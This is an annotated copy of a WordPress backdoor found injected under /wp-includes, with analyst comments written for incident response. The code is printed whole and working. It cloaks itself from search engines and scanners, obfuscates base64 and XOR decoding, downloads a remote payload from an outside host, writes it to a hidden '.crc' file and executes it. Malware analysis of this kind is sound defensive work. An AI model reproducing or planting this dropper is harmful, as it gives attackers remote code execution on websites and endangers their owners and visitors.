infected wp: /wp-includes
<?php
// Analyst annotation: this is a WordPress backdoor/dropper found injected under
// /wp-includes (per the gist title). The comments below describe what the code
// does for incident-response purposes; the code itself is left exactly as found.
// Silence every error so that a failure further down (missing file handle,
// undefined match, failed include) never shows up in the rendered page.
@ini_set('display_errors', '0');
error_reporting(0);
// Case-insensitive (~...~i) user-agent denylist. It starts with "google" and also
// names security scanners (e.g. Acunetix), SEO/archive crawlers and download tools.
// The guard below uses it as a NEGATIVE filter: the payload only runs for visitors
// that do NOT match, which keeps the injected behaviour out of search-engine and
// scanner results (cloaking). The literal appears split across two lines here
// ("WebGo" / "IS"); presumably a line break introduced when the file was rendered.
$bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo 
IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i';
// Request denylist matched against host + URI: admin, login, cron, xmlrpc, REST
// (wp-json), feeds and static-asset extensions. Also a negative filter, so the
// payload fires only on ordinary front-end page views, never on dashboard
// requests or asset fetches.
$bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|\.xml|wp-admin|administrator#';
// Activation guard (note the three negations): run only when the user agent is NOT
// in the denylist, httpget() is NOT already defined (avoids a fatal redeclaration if
// the stub was injected into more than one file), and host+URI does NOT hit the
// path denylist. The @ also hides the notice when HTTP_USER_AGENT is absent.
if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) {
// Obfuscated name construction so "base64_decode" never appears literally. Traced:
//   $ea = '_shaesx_'  -> str_replace('_sha', 'bas') -> 'basesx_'
//   $ee = $ea . 'decode'                            -> 'basesx_decode'
//   $oa = str_replace('sx', '64', $ee)              -> 'base64_decode'
// $ay = 'httpget' and $ao = 'wp_cd' are invoked below as variable functions.
// $algo = 'crc' becomes the name of the drop file: a hidden ".crc" in a writable
// directory, which is the on-disk artefact to search for.
$ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'crc';
// Encoded blob. Below it goes through base64_decode, then wp_cd(..., 'wp_function'),
// and the result is handed to httpget(), so it presumably decodes to the URL of the
// payload server (not decoded here).
$pass = "Zgc5c4MXrLszcAQOrYpaOLGePlOUMLhZ3zuKAQ==";
/**
 * Fetch $url over HTTP and return the response body, or false.
 *
 * Three strategies, tried in order: cURL (8 s connect / 15 s total timeout, body
 * only), file_get_contents() when allow_url_fopen is enabled, and finally a
 * hand-written HTTP/1.1 GET over fsockopen() (3 s connect timeout, plain TCP,
 * port 80 unless the URL says otherwise). There is no restriction on the host
 * and no size limit; this is the outbound fetch of the remote payload.
 * Detection hint: outbound HTTP from the web-server process to an unexpected
 * host during ordinary page views.
 *
 * @param string $url URL to fetch
 * @return string|false response body, or false when every strategy fails
 */
function httpget($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
return $data;
} elseif (@ini_get('allow_url_fopen')) {
return @file_get_contents($url);
} else {
// Raw-socket fallback: rebuild "path?query#fragment" from parse_url() output.
$parts = parse_url($url);
$target = $parts['host'];
$port = isset($parts['port']) ? $parts['port'] : 80;
$page = isset($parts['path']) ? $parts['path'] : '';
$page .= isset($parts['query']) ? '?' . $parts['query'] : '';
$page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
$page = ($page == '') ? '/' : $page;
if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
// socket_set_option() belongs to ext/sockets and expects a Socket, not the
// stream resource fsockopen() returns; the @ hides the resulting error, so this
// receive timeout most likely has no effect.
@socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1));
$headers = "GET $page HTTP/1.1\r\n";
$headers .= "Host: {$parts['host']}\r\n";
$headers .= "Connection: Close\r\n\r\n";
if (fwrite($fp, $headers)) {
$resp = '';
// Read until EOF (the request asked for Connection: Close) in 128-byte chunks.
while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
$resp .= $curr;
}
// Only return a body when the last read did not fail.
if (isset($curr) && $curr !== false) {
fclose($fp);
// Drop the header block: strstr() keeps everything from the blank line on,
// substr(..., 3) then skips "\r\n\r", leaving the body prefixed by one "\n".
return substr(strstr($resp, "\r\n\r\n"), 3);
}
}
fclose($fp);
}
}
return false;
}
/**
 * Symmetric XOR transform used to hide the payload URL: XORs $fd with a
 * keystream derived from $fa.
 *
 * The keystream $ff grows by repeatedly hashing sha1($fa . <keystream so far> .
 * "wp_frmfunct"), turning the hex digest into raw bytes with pack('H*') and
 * appending its first $n bytes (8 per round when the input is longer than 100
 * bytes, otherwise 2) until it is at least as long as $fd. PHP's string XOR
 * truncates to the shorter operand, so the result has strlen($fd) bytes.
 * Running the function twice with the same $fa restores the input, and the
 * "key" is a literal in the caller ('wp_function'), so this is obfuscation,
 * not protection. The wp_ prefix and "wp_frmfunct" appear chosen to blend in
 * with WordPress naming.
 *
 * @param string $fd data to transform
 * @param string $fa key material mixed into every hash round
 * @return string transformed data, same length as $fd
 */
function wp_cd($fd, $fa="")
{
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
// Stage 2: resolve and download the remote payload. With the names built above this
// line reads httpget(wp_cd(base64_decode($pass), 'wp_function')).
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
// The payload is expected between the markers "gogo" ... "enen" (case-insensitive,
// dot matches newlines). The match result is never checked: if the fetch fails,
// $mtchs[1] is undefined and an empty drop file is written (notice suppressed above).
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
// Stage 3: look for an existing drop file named ".crc" in every immediate
// subdirectory of the current directory, and one level deeper, and include it so a
// previously staged payload is reused.
$dirs = glob("*", GLOB_ONLYDIR);
$ura = 0;
foreach ($dirs as $dira) {
if (file_exists("$dira/.$algo")) {
$ura = 1;
$eb = "$dira/";
@include_once "$dira/.$algo";
break;
}
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (file_exists("$subdira/.$algo")) {
$ura = 1;
$eb = "$subdira/";
// Note: includes "$dira/.crc" although the file that was found is "$subdira/.crc";
// looks like a slip in the original. $eb does point at the subdirectory, so the
// final @include at the bottom still loads the subdirectory file. This break only
// leaves the inner loop; the outer loop keeps scanning.
@include_once("$dira/.$algo");
break;
}
}
}
// Stage 4: no drop file yet -> probe for a writable directory with the same two-level
// walk, then fall back to the current directory. The probe is fopen(..., 'w'), which
// itself creates (or truncates) the file; on success the file is opened a second time
// for $hdl and the first handle is never closed. The on-disk artefact is therefore a
// hidden ".crc" file in the first writable subdirectory (or cwd) of the including script.
if (!$ura) {
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) {
$ura = 1;
$eb = "$dira/";
$hdl = fopen("$dira/.$algo", 'w');
break;
}
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) {
$ura = 1;
$eb = "$subdira/";
$hdl = fopen("$subdira/.$algo", 'w');
break;
}
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
// Stage 5: write the URL-decoded payload into the drop file and execute it within this
// request. This is the remote-code-execution step; everything above only hides and
// stages it. If no writable location was found, $hdl is undefined and these calls
// fail silently. Remediation: remove this injected block and every ".crc" drop file,
// and review the web server's outbound requests for the payload host.
fwrite($hdl, rawurldecode($mtchs[1]));
fclose($hdl);
@include("{$eb}.$algo");
}
}
?>